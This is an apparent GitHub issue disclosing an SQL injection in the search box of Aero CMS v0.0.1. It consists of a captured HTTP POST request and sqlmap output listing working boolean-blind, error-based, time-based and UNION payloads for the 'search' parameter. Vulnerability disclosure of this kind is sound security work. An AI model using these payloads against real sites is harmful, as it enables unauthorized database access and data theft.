
Aero CMS v0.0.1 - SQL Injection (search box)

Status: Open. MorphyKutay opened this issue 1 year ago • 0 comments

```http
POST /search.php HTTP/1.1
Host: 192.168.243.133
Content-Length: 19
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://192.168.243.133/
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.243.133/search.php
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=dt1o6jbah3s8qdti60pg464i59
Connection: close

search='saas&submit=
```


```text
sqlmap identified the following injection point(s) with a total of 134 HTTP(s) requests:

Parameter: search (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: search=saas' OR NOT 8064=8064#&submit=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: search=saas' AND (SELECT 8045 FROM(SELECT COUNT(*),CONCAT(0x716a7a7a71,(SELECT (ELT(8045=8045,1))),0x71766b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ZINc&submit=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: search=saas' AND (SELECT 5006 FROM (SELECT(SLEEP(5)))tyOR)-- wINj&submit=

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: search=saas' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a7a7a71,0x5142655063635254574b6b4967424f53796e4f465a784a6e576b4868654868735956434d6e63544d,0x71766b7071),NULL,NULL,NULL,NULL,NULL,NULL#&submit=
```

(screenshot attached in the original issue)

MorphyKutay, Apr 25 '23 11:04